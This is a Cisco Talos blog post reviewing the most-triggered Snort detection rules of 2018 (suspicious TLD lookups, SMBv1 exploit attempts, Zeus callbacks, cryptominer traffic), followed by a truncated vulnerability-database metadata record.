2018 in Snort Rules

2019-02-06T08:19:00

Description

_This blog post was authored by Benny Ketelslegers of Cisco Talos_ _ _The cybersecurity field shifted quite a bit in 2018. With the boom of cryptocurrency, we saw a transition from ransomware to [cryptocurrency miners](<https://blog.talosintelligence.com/2018/01/malicious-xmr-mining.html>). Talos researchers identified APT campaigns including [VPNFilter](<https://blog.talosintelligence.com/2018/05/VPNFilter.html>), predominantly affecting small business and home office networking equipment, as well as [Olympic Destroyer](<https://blog.talosintelligence.com/2018/02/olympic-destroyer.html>), apparently designed to disrupt the Winter Olympics. But these headline-generating attacks were only a small part of the day-to-day protection provided by security systems. In this post, we'll review some of the findings created by investigating the most frequently triggered SNORTⓇ rules as reported by [Cisco Meraki](<https://meraki.cisco.com/>) systems. These rules protected our customers from some of the most common attacks that, even though they aren't as widely known, could be just as disruptive as something like Olympic Destroyer. Snort is a free, open-source network intrusion prevention system. Cisco Talos provides new rule updates to Snort every week to protect against software vulnerabilities and the latest malware. ### Top 5 Rules Snort rules trigger on network behavior ranging from attempts to probe networked systems, attempts at exploiting systems, to detecting known malicious command and control traffic. Each rules detects specific network activity, and each rules has a unique identifier. This identifier is comprised of three parts. The Generator ID (GID), the rule ID (SID) and revision number. The GID identifies what part of Snort generates the event. For example, "1" indicates an event has been generated from the text rules subsystem. The SID uniquely identifies the rule itself. You can search for information on SIDs via the search tool on the [Snort website](<https://www.snort.org/>). The revision number is the version of the rule. Be sure to use the latest revision of any rule. Snort rules are classified into different classes based on the type of activity detected with the most commonly reported class type being "policy-violation" followed by "trojan-activity" and "attempted-admin." Some less frequently reported class types such as "attempted user" and "web-application-attack" are particularly interesting in the context of detecting malicious inbound and outbound network traffic. Cisco Meraki-managed devices protect clients networks and give us an overview of the wider threat environment. These are the five most triggered rules within policy, in reverse order. #### No. 5: 1:43687:2 "suspicious .top dns query" The .top top-level domain extension is a generic top level domain and has been observed in malware campaigns such as the [Angler exploit kit](<https://blog.talosintelligence.com/2016/03/angler-slips-hook.html>) and the [Necurs botnet](<https://blog.talosintelligence.com/2018/01/the-many-tentacles-of-necurs-botnet.html>). This top-level domain can be bought as cheap as 1 USD and is the reason it is very popular with cybercriminals for their malware and phishing campaigns. This signature triggers on DNS lookups for .top domains. Such a case doesn’t necessarily mean that such a lookup is malicious in nature, but it can be a useful indicator for suspicious activity on a network. A sharp increase in this rule triggering on a network should be investigated as to the cause, especially if a single device is responsible for a large proportion of these triggers. #### No. 4: 1:41978:5 "Microsoft Windows SMB remote code execution attempt" In May 2017, a [vulnerability](<https://www.us-cert.gov/ncas/current-activity/2017/03/16/Microsoft-SMBv1-Vulnerability>) in SMBv1 was published that could allow remote attackers to execute arbitrary code via crafted packets. This led to the outbreak of the network worms [Wannacry](<https://blog.talosintelligence.com/2017/05/wannacry.html>) and [Nyetya](<https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html>) in 2017. Although it did not make our top five rules in 2017, it seems there was still a lot scanning or attempts to exploit this vulnerability in 2018. This shows the importance of network defenses and patching management programs as often as possible. Organizations should ensure that devices running Windows are fully patched. Additionally, they should have SMB ports 139 and 445 blocked from all externally accessible hosts. #### No. 3: 1:39867:4 "Suspicious .tk dns query" The .tk top-level domain is owned by the South Pacific territory of Tokelau. The domain registry allows for the registration of domains without payment, which leads to the .tk top level domain being one of the most prolific in terms of the number of domain names registered. However, this free registration leads to .tk domains frequently being abused by attackers. This rule triggers on DNS lookups for .tk domains. Such a case doesn't necessarily mean that such a lookup is malicious in nature, but it can be a useful indicator for suspicious activity on a network. A sharp increase in this rule triggering on a network should be investigated as to the cause, especially if a single device is responsible for a large proportion of these triggers. Other, similar rules detecting DNS lookups to other rarely used top-level domains such as .bit, .pw and .top also made into our list of top 20 most triggered rules. #### No. 2: 1:35030:1 & 1:23493:6 "Win.Trojan.Zeus variant outbound connection" Historically, one of the most high-profile pieces of malware is [Zeus/Zbot](<https://talosintelligence.com/zeus_trojan>), a notorious trojan that has been employed by botnet operators around the world to steal banking credentials and other personal data, participate in click-fraud schemes, and likely numerous other criminal enterprises. It is the engine behind notorious botnets such as Kneber, which made headlines worldwide. In the beginning of 2018, Talos observed a [Zeus variant](<https://blog.talosintelligence.com/2018/01/cfm-zeus-variant.html>) that was launched using the official website of Ukraine-based accounting software developer Crystal Finance Millennium (CFM). This vector is similar to the attack outlined by Talos in the Nyetya and companion MeDoc blog post. Ukrainian authorities and businesses were alerted by local security firm (ISSP) that another accounting software maker had been compromised. CFM's website was being used to distribute malware that was retrieved by malware downloaders attached to messages associated with a concurrent spam campaign. Ever since the source code of Zeus leaked in 2011, we have seen various variants appear such as [Zeus Panda](<https://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html>) which poisoned Google Search results in order to spread. #### No. 1: 1:46237:1 "PUA-OTHER Cryptocurrency Miner outbound connection attempt" & "1:45549:4 PUA-OTHER XMRig cryptocurrency mining pool connection attempt" Over the past year, we have seen a seismic shift in the threat landscape with the explosive growth of malicious cryptocurrency mining. Cisco Talos created various rules throughout the year to combat Cryptocurrency mining threats and this rule deployed in early 2018, proved to be the number 1 showing the magnitude of attacks this rule detected and protected against. This threat has spread across the internet like wildfire and is being delivered through multiple vectors including email, web, and active exploitation. It is no surprise that these two combined rules are the most often observed triggered Snort rule in 2018. Cryptocurrency mining can use up a considerable amount of computing power and energy that would otherwise be incredibly valuable to any organization. For an overview of all related snort rules and full details of all the methods and technologies Cisco Talos uses to thwart cryptocurrency mining, download the Talos whitepaper [here](<https://www.talosintelligence.com/resources/59>). [![](https://2.bp.blogspot.com/-XcaLfnec00Q/XFsp6eXg_rI/AAAAAAAAACI/fxssE2sbuesqNKpMzg1Lbqnod5iU9u4oQCLcBGAs/s640/012419-Snort-Sigs-Blog-outbound-connection-attempt.png)](<https://2.bp.blogspot.com/-XcaLfnec00Q/XFsp6eXg_rI/AAAAAAAAACI/fxssE2sbuesqNKpMzg1Lbqnod5iU9u4oQCLcBGAs/s1600/012419-Snort-Sigs-Blog-outbound-connection-attempt.png>) ### INBOUND and OUTBOUND Network traffic can cross an IDS from external to internal (inbound), from the internal to external (outbound) interfaces or depending on the architecture of your environment the traffic can avoid being filtered by a firewall or inspected by an IPS/IDS device; this will generally be your local/internal traffic on the same layer2 environment. An alert may be triggered and logged for any of these scenarios depending on the rulesets in place and the configuration of your sensors. Outbound rules were triggered during 2018 much more frequently than internal, which in turn, were more frequent than inbound with ratios of approximately 6.9 to 1. The profile of the alerts are different for each direction. Inbound alerts are likely to detect traffic that can be attributed to attacks on various server-side applications such as web applications or databases. Outbound alerts are more likely to contain detection of outgoing traffic caused by malware infected endpoints. Looking at these data sets in more detail gives us the following: [![](https://4.bp.blogspot.com/-p8YZlzLMQXE/XFsqAliaQcI/AAAAAAAAACM/XhgffiU6hUYdyd21OCDF_QJAEpBKYYn1gCLcBGAs/s640/012419-Snort-Sigs-Blog-inbound-signature-types.png)](<https://4.bp.blogspot.com/-p8YZlzLMQXE/XFsqAliaQcI/AAAAAAAAACM/XhgffiU6hUYdyd21OCDF_QJAEpBKYYn1gCLcBGAs/s1600/012419-Snort-Sigs-Blog-inbound-signature-types.png>) While trojan activity was rule type we saw the most of in 2018, making up 42.5 percent of all alerts, we can now see "Server-Apache" taking the lead followed by "OS-Windows" as a close second. The "Server-Apache" class type covers Apache related attacks which in this case consisted mainly of 1:41818 and 1:41819 detecting the Jakarta Multipart parser vulnerability in Apache Struts ([CVE-2017-5638](<https://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>)). Later in 2017, a second Apache Struts vulnerability was discovered under CVE-2017-9805, making this rule type the most observed one for 2018 IDS alerts. "OS-Windows" class alerts were mainly triggered by Snort rule 1:41978, which covers the SMBv1 vulnerability exploited by [Wannacry](<https://blog.talosintelligence.com/2017/05/wannacry.html>) and [NotPetya](<https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html>) (MS-17-010). The "Browser-plugins" class type covers attempts to exploit vulnerabilities in browsers that deal with plugins to the browser. (Example: ActiveX). Most activity for 2018 seems to consist of Sid 1:8068 which is amongst others linked to the "Microsoft Outlook Security Feature Bypass Vulnerability" (CVE-2017-11774). [](<http://2.bp.blogspot.com/-lKN6ktW9YRg/XF2L_nSsNfI/AAAAAAAAAVw/6G830jVQQA8On0TJLRDs0enzFolMyl-0QCK4BGAYYCw/s1600/012419-Snort-Sigs-Blog-outbound-signature-types.png>)[![](https://1.bp.blogspot.com/-hrZUBsvx4sw/XF2Py-Y-_-I/AAAAAAAAAWI/TU0EcE5KCNwNtIznDY93Bt6Hjn0WCih4QCK4BGAYYCw/s1600/012419-Snort-Sigs-Blog-outbound-signature-types.png)](<http://1.bp.blogspot.com/-hrZUBsvx4sw/XF2Py-Y-_-I/AAAAAAAAAWI/TU0EcE5KCNwNtIznDY93Bt6Hjn0WCih4QCK4BGAYYCw/s1600/012419-Snort-Sigs-Blog-outbound-signature-types.png>) For outbound connections, we observed a large shift toward the "PUA-Other" class, which is mainly a cryptocurrency miner outbound connection attempt. Cryptomining can take up a large amount of valuable enterprise resources in terms of electricity and CPU power. To see how to block Cryptomining in an enterprise using Cisco Security Products, have a look at our [w](<https://blog.talosintelligence.com/2018/07/blocking-cryptomining.html>)[hitepaper](<https://blog.talosintelligence.com/2018/07/blocking-cryptomining.html>) published in July 2018. The most frequently triggered rules within the "Malware-CNC" rule class are the Zeus trojan activity rules discussed above. ### Conclusion Snort rules detect potentially malicious network activity. Understanding why particular rules are triggered and how they can protect systems is a key part of network security. Snort rules can detect and block attempts at exploiting vulnerable systems, indicate when a system is under attack, when a system has been compromised, and help keep users safe from interacting with malicious systems. They can also be used to detect reconnaissance and pre-exploitation activity, indicating that an attacker is attempting to identify weaknesses in an organization's security posture. These can be used to indicate when an organization should be in a heightened state of awareness about the activity occurring within their environment and more suspicious of security alerts being generated. As the threat environment changes, it is necessary to ensure that the correct rules are in place protecting systems. Usually, this means ensuring that the most recent rule set has been promptly downloaded and installed. As shown in the Apache Struts vulnerability data, the time between a vulnerability being discovered and exploited may be short. Our most commonly triggered rule in 2018: 1:46237:1 "PUA-OTHER Cryptocurrency Miner outbound connection attempt" highlights the necessity of protecting IoT devices from attack. Malware such as Mirai seeks to compromise these systems to use them as part of a botnet to put to use for further malicious behaviour. Network architectures need to take these attacks into consideration and ensure that all networked devices no matter how small are protected. Security teams need to understand their network architectures and understand the significance of rules triggering in their environment. For full understanding of the meaning of triggered detections it is important for the rules to be open source. Knowing what network content caused a rule to trigger tells you about your network and allows you to keep abreast of the threat environment as well as the available protection. At Talos, we are proud to maintain a set of open source Snort rules and support the thriving community of researchers contributing to Snort and helping to keep networks secure against attack. We're also proud to contribute to the training and education of network engineers through the Cisco Networking Academy, as well through the release of additional open-source tools and the detailing of attacks on our blog. You can [subscribe](<https://www.snort.org/products>) to Talos' newest rule detection functionality for as low as $29 a year with a personal account. Be sure and see our business pricing for Snort as well [here](<https://snort.org/products%23rule_subscriptions>).![](http://feeds.feedburner.com/~r/feedburner/Talos/~4/6rupY-noy3s)

{"id": "TALOSBLOG:DAD87115458AF1FB5EDF5A2BB21D8AB9", "type": "talosblog", "bulletinFamily": "blog", "title": "2018 in Snort Rules", "description": "_This blog post was authored by Benny Ketelslegers of Cisco Talos_ \n_ \n_The cybersecurity field shifted quite a bit in 2018. With the boom of cryptocurrency, we saw a transition from ransomware to [cryptocurrency miners](<https://blog.talosintelligence.com/2018/01/malicious-xmr-mining.html>). Talos researchers identified APT campaigns including [VPNFilter](<https://blog.talosintelligence.com/2018/05/VPNFilter.html>), predominantly affecting small business and home office networking equipment, as well as [Olympic Destroyer](<https://blog.talosintelligence.com/2018/02/olympic-destroyer.html>), apparently designed to disrupt the Winter Olympics. \n \nBut these headline-generating attacks were only a small part of the day-to-day protection provided by security systems. In this post, we'll review some of the findings created by investigating the most frequently triggered SNORT\u24c7 rules as reported by [Cisco Meraki](<https://meraki.cisco.com/>) systems. These rules protected our customers from some of the most common attacks that, even though they aren't as widely known, could be just as disruptive as something like Olympic Destroyer. Snort is a free, open-source network intrusion prevention system. Cisco Talos provides new rule updates to Snort every week to protect against software vulnerabilities and the latest malware. \n \n \n\n\n### Top 5 Rules\n\n \nSnort rules trigger on network behavior ranging from attempts to probe networked systems, attempts at exploiting systems, to detecting known malicious command and control traffic. Each rules detects specific network activity, and each rules has a unique identifier. This identifier is comprised of three parts. The Generator ID (GID), the rule ID (SID) and revision number. The GID identifies what part of Snort generates the event. For example, \"1\" indicates an event has been generated from the text rules subsystem. The SID uniquely identifies the rule itself. You can search for information on SIDs via the search tool on the [Snort website](<https://www.snort.org/>). The revision number is the version of the rule. Be sure to use the latest revision of any rule. \n \nSnort rules are classified into different classes based on the type of activity detected with the most commonly reported class type being \"policy-violation\" followed by \"trojan-activity\" and \"attempted-admin.\" Some less frequently reported class types such as \"attempted user\" and \"web-application-attack\" are particularly interesting in the context of detecting malicious inbound and outbound network traffic. \n \nCisco Meraki-managed devices protect clients networks and give us an overview of the wider threat environment. These are the five most triggered rules within policy, in reverse order. \n \n\n\n#### No. 5: 1:43687:2 \"suspicious .top dns query\"\n\n \nThe .top top-level domain extension is a generic top level domain and has been observed in malware campaigns such as the [Angler exploit kit](<https://blog.talosintelligence.com/2016/03/angler-slips-hook.html>) and the [Necurs botnet](<https://blog.talosintelligence.com/2018/01/the-many-tentacles-of-necurs-botnet.html>). This top-level domain can be bought as cheap as 1 USD and is the reason it is very popular with cybercriminals for their malware and phishing campaigns. \n \nThis signature triggers on DNS lookups for .top domains. Such a case doesn\u2019t necessarily mean that such a lookup is malicious in nature, but it can be a useful indicator for suspicious activity on a network. A sharp increase in this rule triggering on a network should be investigated as to the cause, especially if a single device is responsible for a large proportion of these triggers. \n \n\n\n#### No. 4: 1:41978:5 \"Microsoft Windows SMB remote code execution attempt\"\n\n \nIn May 2017, a [vulnerability](<https://www.us-cert.gov/ncas/current-activity/2017/03/16/Microsoft-SMBv1-Vulnerability>) in SMBv1 was published that could allow remote attackers to execute arbitrary code via crafted packets. This led to the outbreak of the network worms [Wannacry](<https://blog.talosintelligence.com/2017/05/wannacry.html>) and [Nyetya](<https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html>) in 2017. Although it did not make our top five rules in 2017, it seems there was still a lot scanning or attempts to exploit this vulnerability in 2018. This shows the importance of network defenses and patching management programs as often as possible. \n \nOrganizations should ensure that devices running Windows are fully patched. Additionally, they should have SMB ports 139 and 445 blocked from all externally accessible hosts. \n \n\n\n#### No. 3: 1:39867:4 \"Suspicious .tk dns query\"\n\n \nThe .tk top-level domain is owned by the South Pacific territory of Tokelau. The domain registry allows for the registration of domains without payment, which leads to the .tk top level domain being one of the most prolific in terms of the number of domain names registered. However, this free registration leads to .tk domains frequently being abused by attackers. \n \nThis rule triggers on DNS lookups for .tk domains. Such a case doesn't necessarily mean that such a lookup is malicious in nature, but it can be a useful indicator for suspicious activity on a network. A sharp increase in this rule triggering on a network should be investigated as to the cause, especially if a single device is responsible for a large proportion of these triggers. \n \nOther, similar rules detecting DNS lookups to other rarely used top-level domains such as .bit, .pw and .top also made into our list of top 20 most triggered rules. \n \n\n\n#### No. 2: 1:35030:1 & 1:23493:6 \"Win.Trojan.Zeus variant outbound connection\"\n\n \nHistorically, one of the most high-profile pieces of malware is [Zeus/Zbot](<https://talosintelligence.com/zeus_trojan>), a notorious trojan that has been employed by botnet operators around the world to steal banking credentials and other personal data, participate in click-fraud schemes, and likely numerous other criminal enterprises. It is the engine behind notorious botnets such as Kneber, which made headlines worldwide. \n \nIn the beginning of 2018, Talos observed a [Zeus variant](<https://blog.talosintelligence.com/2018/01/cfm-zeus-variant.html>) that was launched using the official website of Ukraine-based accounting software developer Crystal Finance Millennium (CFM). \n \nThis vector is similar to the attack outlined by Talos in the Nyetya and companion MeDoc blog post. Ukrainian authorities and businesses were alerted by local security firm (ISSP) that another accounting software maker had been compromised. CFM's website was being used to distribute malware that was retrieved by malware downloaders attached to messages associated with a concurrent spam campaign. \n \nEver since the source code of Zeus leaked in 2011, we have seen various variants appear such as [Zeus Panda](<https://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html>) which poisoned Google Search results in order to spread. \n \n\n\n#### No. 1: 1:46237:1 \"PUA-OTHER Cryptocurrency Miner outbound connection attempt\" & \"1:45549:4 PUA-OTHER XMRig cryptocurrency mining pool connection attempt\"\n\n \nOver the past year, we have seen a seismic shift in the threat landscape with the explosive growth of malicious cryptocurrency mining. Cisco Talos created various rules throughout the year to combat Cryptocurrency mining threats and this rule deployed in early 2018, proved to be the number 1 showing the magnitude of attacks this rule detected and protected against. This threat has spread across the internet like wildfire and is being delivered through multiple vectors including email, web, and active exploitation. It is no surprise that these two combined rules are the most often observed triggered Snort rule in 2018. \n \nCryptocurrency mining can use up a considerable amount of computing power and energy that would otherwise be incredibly valuable to any organization. \n \nFor an overview of all related snort rules and full details of all the methods and technologies Cisco Talos uses to thwart cryptocurrency mining, download the Talos whitepaper [here](<https://www.talosintelligence.com/resources/59>). \n \n\n\n \n\n\n[![](https://2.bp.blogspot.com/-XcaLfnec00Q/XFsp6eXg_rI/AAAAAAAAACI/fxssE2sbuesqNKpMzg1Lbqnod5iU9u4oQCLcBGAs/s640/012419-Snort-Sigs-Blog-outbound-connection-attempt.png)](<https://2.bp.blogspot.com/-XcaLfnec00Q/XFsp6eXg_rI/AAAAAAAAACI/fxssE2sbuesqNKpMzg1Lbqnod5iU9u4oQCLcBGAs/s1600/012419-Snort-Sigs-Blog-outbound-connection-attempt.png>)\n\n \n\n\n### INBOUND and OUTBOUND\n\n \nNetwork traffic can cross an IDS from external to internal (inbound), from the internal to external (outbound) interfaces or depending on the architecture of your environment the traffic can avoid being filtered by a firewall or inspected by an IPS/IDS device; this will generally be your local/internal traffic on the same layer2 environment. An alert may be triggered and logged for any of these scenarios depending on the rulesets in place and the configuration of your sensors. \n \n \nOutbound rules were triggered during 2018 much more frequently than internal, which in turn, were more frequent than inbound with ratios of approximately 6.9 to 1. The profile of the alerts are different for each direction. Inbound alerts are likely to detect traffic that can be attributed to attacks on various server-side applications such as web applications or databases. Outbound alerts are more likely to contain detection of outgoing traffic caused by malware infected endpoints. \n \nLooking at these data sets in more detail gives us the following: \n \n\n\n[![](https://4.bp.blogspot.com/-p8YZlzLMQXE/XFsqAliaQcI/AAAAAAAAACM/XhgffiU6hUYdyd21OCDF_QJAEpBKYYn1gCLcBGAs/s640/012419-Snort-Sigs-Blog-inbound-signature-types.png)](<https://4.bp.blogspot.com/-p8YZlzLMQXE/XFsqAliaQcI/AAAAAAAAACM/XhgffiU6hUYdyd21OCDF_QJAEpBKYYn1gCLcBGAs/s1600/012419-Snort-Sigs-Blog-inbound-signature-types.png>)\n\n \nWhile trojan activity was rule type we saw the most of in 2018, making up 42.5 percent of all alerts, we can now see \"Server-Apache\" taking the lead followed by \"OS-Windows\" as a close second. \n \nThe \"Server-Apache\" class type covers Apache related attacks which in this case consisted mainly of 1:41818 and 1:41819 detecting the Jakarta Multipart parser vulnerability in Apache Struts ([CVE-2017-5638](<https://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>)). Later in 2017, a second Apache Struts vulnerability was discovered under CVE-2017-9805, making this rule type the most observed one for 2018 IDS alerts. \n \n\"OS-Windows\" class alerts were mainly triggered by Snort rule 1:41978, which covers the SMBv1 vulnerability exploited by [Wannacry](<https://blog.talosintelligence.com/2017/05/wannacry.html>) and [NotPetya](<https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html>) (MS-17-010). \n \nThe \"Browser-plugins\" class type covers attempts to exploit vulnerabilities in browsers that deal with plugins to the browser. (Example: ActiveX). Most activity for 2018 seems to consist of Sid 1:8068 which is amongst others linked to the \"Microsoft Outlook Security Feature Bypass Vulnerability\" (CVE-2017-11774). \n\n\n \n\n\n[](<http://2.bp.blogspot.com/-lKN6ktW9YRg/XF2L_nSsNfI/AAAAAAAAAVw/6G830jVQQA8On0TJLRDs0enzFolMyl-0QCK4BGAYYCw/s1600/012419-Snort-Sigs-Blog-outbound-signature-types.png>)[![](https://1.bp.blogspot.com/-hrZUBsvx4sw/XF2Py-Y-_-I/AAAAAAAAAWI/TU0EcE5KCNwNtIznDY93Bt6Hjn0WCih4QCK4BGAYYCw/s1600/012419-Snort-Sigs-Blog-outbound-signature-types.png)](<http://1.bp.blogspot.com/-hrZUBsvx4sw/XF2Py-Y-_-I/AAAAAAAAAWI/TU0EcE5KCNwNtIznDY93Bt6Hjn0WCih4QCK4BGAYYCw/s1600/012419-Snort-Sigs-Blog-outbound-signature-types.png>)\n\n \n \nFor outbound connections, we observed a large shift toward the \"PUA-Other\" class, which is mainly a cryptocurrency miner outbound connection attempt. Cryptomining can take up a large amount of valuable enterprise resources in terms of electricity and CPU power. To see how to block Cryptomining in an enterprise using Cisco Security Products, have a look at our [w](<https://blog.talosintelligence.com/2018/07/blocking-cryptomining.html>)[hitepaper](<https://blog.talosintelligence.com/2018/07/blocking-cryptomining.html>) published in July 2018. \n \nThe most frequently triggered rules within the \"Malware-CNC\" rule class are the Zeus trojan activity rules discussed above. \n\n\n### Conclusion\n\n \n\n\nSnort rules detect potentially malicious network activity. Understanding why particular rules are triggered and how they can protect systems is a key part of network security. Snort rules can detect and block attempts at exploiting vulnerable systems, indicate when a system is under attack, when a system has been compromised, and help keep users safe from interacting with malicious systems. They can also be used to detect reconnaissance and pre-exploitation activity, indicating that an attacker is attempting to identify weaknesses in an organization's security posture. These can be used to indicate when an organization should be in a heightened state of awareness about the activity occurring within their environment and more suspicious of security alerts being generated. \n \nAs the threat environment changes, it is necessary to ensure that the correct rules are in place protecting systems. Usually, this means ensuring that the most recent rule set has been promptly downloaded and installed. As shown in the Apache Struts vulnerability data, the time between a vulnerability being discovered and exploited may be short. \n \nOur most commonly triggered rule in 2018: 1:46237:1 \"PUA-OTHER Cryptocurrency Miner outbound connection attempt\" highlights the necessity of protecting IoT devices from attack. Malware such as Mirai seeks to compromise these systems to use them as part of a botnet to put to use for further malicious behaviour. Network architectures need to take these attacks into consideration and ensure that all networked devices no matter how small are protected. \n \nSecurity teams need to understand their network architectures and understand the significance of rules triggering in their environment. For full understanding of the meaning of triggered detections it is important for the rules to be open source. Knowing what network content caused a rule to trigger tells you about your network and allows you to keep abreast of the threat environment as well as the available protection. \n \nAt Talos, we are proud to maintain a set of open source Snort rules and support the thriving community of researchers contributing to Snort and helping to keep networks secure against attack. We're also proud to contribute to the training and education of network engineers through the Cisco Networking Academy, as well through the release of additional open-source tools and the detailing of attacks on our blog. \n \nYou can [subscribe](<https://www.snort.org/products>) to Talos' newest rule detection functionality for as low as $29 a year with a personal account. Be sure and see our business pricing for Snort as well [here](<https://snort.org/products%23rule_subscriptions>).![](http://feeds.feedburner.com/~r/feedburner/Talos/~4/6rupY-noy3s)", "published": "2019-02-06T08:19:00", "modified": "2019-02-12T14:15:53", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 10.0}, "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/6rupY-noy3s/2018-in-snort-signatures.html", "reporter": "noreply@blogger.com (Benny Ketelslegers)", "references": [], "cvelist": ["CVE-2017-11774", "CVE-2017-5638", "CVE-2017-9805"], "lastseen": "2019-02-12T15:23:07", "viewCount": 1355, "enchantments": {"score": {"value": -0.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "atlassian", "idList": ["ATLASSIAN:BAM-18242", "ATLASSIAN:CWD-4879", "BAM-18242", "CWD-4879"]}, {"type": "attackerkb", "idList": ["AKB:0BE9878D-891A-4133-B0C0-C05BF85E129C", "AKB:195A97E5-45A3-4A70-95E4-60FF9B5AD20D", "AKB:289DC3CE-ED8A-4366-89F0-46E148584C36", "AKB:4D7DB359-066E-4E56-AFBB-FA98BF564F13", "AKB:BDF59C15-D64F-45D5-B1AC-D1B9DD354080"]}, {"type": "canvas", "idList": ["STRUTS_OGNL"]}, {"type": "cert", "idList": ["VU:112992", "VU:834067"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0197", "CPAI-2017-0676", "CPAI-2017-0742", "CPAI-2019-0832"]}, {"type": "cisa", "idList": ["CISA:C0680147E070CCC4182A654B22694B78"]}, {"type": "cisco", "idList": ["CISCO-SA-20170310-STRUTS2", "CISCO-SA-20170907-STRUTS2"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:3B3A927B1B8E5A80A8EA38A6AACF98EE", "CFOUNDRY:C2B8B89ADB85BB41095EAA7D88C0E350"]}, {"type": "cve", "idList": ["CVE-2017-11774", "CVE-2017-5638", "CVE-2017-9805"]}, {"type": "dsquare", "idList": ["E-643"]}, {"type": "exploitdb", "idList": ["EDB-ID:42627"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:DEBBBD9CB5D7CBBF28AAD15BB9949E3A"]}, {"type": "f5", "idList": ["F5:K43451236", "F5:K84144321"]}, {"type": "fireeye", "idList": ["FIREEYE:138CE2722761C87436AF4E8AA1B5FF22", "FIREEYE:A6971C196BCA3B73B3F64A1FE0801A5B"]}, {"type": "fortinet", "idList": ["FG-IR-17-205"]}, {"type": "github", "idList": ["GHSA-GG9M-FJ3V-R58C", "GHSA-J77Q-2QQG-6989"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170316-01-STRUTS2"]}, {"type": "ibm", "idList": ["6470A30C25E8E98A770393E4946FDE7CFE3362A1DD3B87E75F8DB1F7CE3E88A5", "7E0744D5936EDC5F018B0850D801B665D388060D6A81B986BC7AD81C9A78C0EE", "7E0CCCCB457D8A77AB9E189B336C99165EE3DEBFD72C3969F0C1103ED1D1CC6D"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:38007E943B20A50B729BC17911999C11", "IMPERVABLOG:4F187FDBA230373382F26BA12E00F8E7", "IMPERVABLOG:5E50E2263AEAFE98B90E01B16AA73334", "IMPERVABLOG:697E34BE77BECD65BF763ECF92DD1B9F", "IMPERVABLOG:6BF557CA0830C9058E2409E8C914366C", "IMPERVABLOG:81785CACF2722C5387530DCFDE54E6E4", "IMPERVABLOG:9AF395FCAE299375F787DBC7B797E713", "IMPERVABLOG:C40BB28F51D206C8BB23721D1ECED353", "IMPERVABLOG:D4ED0576717DBEEDCF6B9B98BADC92BD", "IMPERVABLOG:DA39045C8E700086C560AAFFDBA589A6"]}, {"type": "kaspersky", "idList": ["KLA11113"]}, {"type": "kitploit", "idList": ["KITPLOIT:1841841790447853746", "KITPLOIT:2304674796555328667", "KITPLOIT:4611207874033525364", "KITPLOIT:5052987141331551837", "KITPLOIT:5230099254245458698", "KITPLOIT:5420210148456420402", "KITPLOIT:7013881512724945934", "KITPLOIT:7835941952769002973", "KITPLOIT:8672599587089685905", "KITPLOIT:9079806502812490909"]}, {"type": "krebs", "idList": ["KREBS:EE70929DE902D9B233E209B73C1AD4A0"]}, {"type": "lenovo", "idList": ["LENOVO:PS500093-APACHE-STRUTS-OPEN-SOURCE-FRAMEWORK-REMOTE-CODE-EXECUTION-NOSID", "LENOVO:PS500093-NOSID"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:4993027161793E66024E0B42522BB53D", "MALWAREBYTES:E65F857AAAC912ABF5A439E335A3376B"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-MULTI-HTTP-STRUTS2_REST_XSTREAM-"]}, {"type": "mscve", "idList": ["MS:CVE-2017-11774"]}, {"type": "mskb", "idList": ["KB4011162", "KB4011178", "KB4011196"]}, {"type": "mssecure", "idList": ["MSSECURE:23C760CCBA6BF2ED8D8132921A32C2A3"]}, {"type": "myhack58", "idList": ["MYHACK58:62201784024", "MYHACK58:62201784026", "MYHACK58:62201784086", "MYHACK58:62201784379", "MYHACK58:62201786819", "MYHACK58:62201789104", "MYHACK58:62201789593", "MYHACK58:62201890758", "MYHACK58:62201891264", "MYHACK58:62201993410"]}, {"type": "nessus", "idList": ["700055.PRM", "MYSQL_ENTERPRISE_MONITOR_3_3_3_1199.NASL", "MYSQL_ENTERPRISE_MONITOR_3_4_3_4225.NASL", "ORACLE_WEBCENTER_SITES_APR_2017_CPU.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_APR_2017.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_JUL_2017.NASL", "ORACLE_WEBLOGIC_SERVER_CVE-2017-9805.NBIN", "SELLIGENT_MESSAGE_STUDIO_RCE.NBIN", "SMB_NT_MS17_OCT_OUTLOOK.NASL", "STRUTS_2_5_10_1_RCE.NASL", "STRUTS_2_5_10_1_WIN_LOCAL.NASL", "STRUTS_2_5_13.NASL", "STRUTS_2_5_13_REST_RCE.NASL", "WEB_APPLICATION_SCANNING_112726", "WEB_APPLICATION_SCANNING_112763"]}, {"type": "nmap", "idList": ["NMAP:HTTP-VULN-CVE2017-5638.NSE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310106640", "OPENVAS:1361412562310106646", "OPENVAS:1361412562310106647", "OPENVAS:1361412562310106652", "OPENVAS:1361412562310106653", "OPENVAS:1361412562310106736", "OPENVAS:1361412562310108771", "OPENVAS:1361412562310140180", "OPENVAS:1361412562310140190", "OPENVAS:1361412562310140229", "OPENVAS:1361412562310141398", "OPENVAS:1361412562310810748", "OPENVAS:1361412562310811244", "OPENVAS:1361412562310811730", "OPENVAS:1361412562310811922", "OPENVAS:1361412562310812024", "OPENVAS:1361412562310812028"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2017", "ORACLE:CPUAPR2017-3236618", "ORACLE:CPUJUL2017", "ORACLE:CPUJUL2017-3236622", "ORACLE:CPUOCT2017", "ORACLE:CPUOCT2017-3236626"]}, {"type": "osv", "idList": ["OSV:GHSA-GG9M-FJ3V-R58C", 